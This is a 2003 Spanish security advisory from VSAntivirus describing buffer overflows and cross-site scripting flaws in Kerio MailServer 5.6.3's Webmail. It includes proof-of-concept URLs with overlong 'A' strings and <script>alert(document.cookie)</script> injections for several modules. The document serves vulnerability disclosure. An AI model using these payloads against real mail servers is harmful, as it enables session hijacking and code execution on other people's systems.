Esta página es un servicio gratuito de Video Soft BBS - SUBSCRIBASE en nuestras listas de correo.

Busque su tema:

VSantivirus  Internet
Proporcionado por FreeFind

Video Soft BBS
Menú Principal
Anti Trojans
Antivirus
Hoaxes
Subscripciones
Otro software
Artículos
Links
Sugerencias
Sobre el BBS
Direcciones
Galería
Chat

Controlado desde el
19/10/97 por NedStat
Múltiples vulnerabilidades y XSS en Kerio MailServer
 
VSantivirus No. 1076 Año 7, Miércoles 18 de junio de 2003

 Múltiples vulnerabilidades y XSS en Kerio MailServer
http://www.vsantivirus.com/vul-keriomail-xss.htm

Por Redacción VSAntivirus
vsantivirus@videosoft.net.uy

Reportado por David F. Madrid
idoru@videosoft.net.uy


Kerio MailServer es un servidor de correo catalogado como "seguro", que brinda soporte para múltiples dominios. Soporta los protocolos POP3, IMAP, SMTP, SMTPAuth, SMS, Webmail, WAPMail MS Active Directory, incluso con encriptación SSL.

David F. Madrid, redactor de Nautopía y colaborador de VSAntivirus, ha reportado múltiples vulnerabilidades en el componente Webmail que Kerio MailServer instala en el puerto 80.

Estas fallas pueden permitir a un intruso que mantenga una cuenta en un servidor con este software, secuestrar la sesión de usuario y hasta ejecutar código en el sistema con privilegios de System (control total sobre el sistema).

Estos son los módulos vulnerables:

Módulo DO_SUBSCRIBE

Un nombre de usuario demasiado extenso provoca una total corrupción de la pila (una porción de la memoria disponible para un programa utilizada para guardar parámetros, variables, etc.):

http://[server]/do_subscribe?showuser=AAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

En este caso se puede sobrescribir el puntero de instrucción EIP de un proceso del programa (los tres primeros bytes). El registro EIP es un puntero de instrucciones (registro índice), que al ejecutarse el código de un programa, le indica al procesador la dirección de memoria en que se encuentra la siguiente instrucción que será ejecutada dentro de dicho segmento de código. Con cada instrucción que se ejecute, este registro (en circunstancias normales), se actualiza automáticamente.

Con esta falla se puede ejecutar código con privilegios de System.

Módulo ADD_ACL

Debido a un insuficiente filtrado de los caracteres en las variables de una petición HTTP cuyo contenido aparece por pantalla, se puede inyectar un script en el contexto de la página:

http://[server]/add_acl?folder=~conde0@localhost
/INBOX&add_name=<script>alert(document.cookie);
</script>

Si se utiliza como carpeta "~admin@localhost/INBOX", se puede lograr que el servidor se congele al pulsar en el enlace.

Por otra parte, el mismo desbordamiento de búfer se produce al utilizar un nombre de usuario extremadamente largo, lo que parece indicar que la misma función es la culpable del fallo:

http://[server]/add_acl?folder=~AAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
@localhost/INBOX&add_name=lucas

Módulo LIST

Se produce el mismo desbordamiento de búfer:

http://[Server]/list?folder=~AAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA@localhost/INBOX

Módulo DO_MAP

Cómo en un caso anterior, un pobre filtrado de los caracteres usados por las variables de la petición HTTP que aparece por pantalla, habilita la inyección de un script en el contexto de la página. Además puede producirse un desbordamiento de búfer similar a los anteriores.

http://[Server]/do_map?action=new&oldalias=eso
&alias=<script>alert(document.cookie);
</script>&folder=public&user=tro

http://[Server]/do_map?action=new&oldalias=eso&
alias=aaa&folder=public&user=AAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAA

Debido a la posibilidad de incluir el exploit en la URL (dirección de la página), un intruso que no tenga acceso al Webmail puede construir un enlace con el código a ejecutar, y esperar que sea pulsado por alguien que tenga abierta una sesión en un servidor Kerio MailServer.

Son afectadas las versiones 5.6.3 de Kerio MailServer (la última al momento actual).

El vendedor fue avisado oportunamente.

Créditos: David F. Madrid <idoru@videosoft.net.uy>


Referencias:

http://nautopia.iespana.es/nautopia/vulnerabilidades/kerio_mailserver.htm
http://www.kerio.com/kms_home.html




(c) Video Soft - http://www.videosoft.net.uy
(c) VSAntivirus - http://www.vsantivirus.com

 

Copyright 1996-2003 Video Soft BBS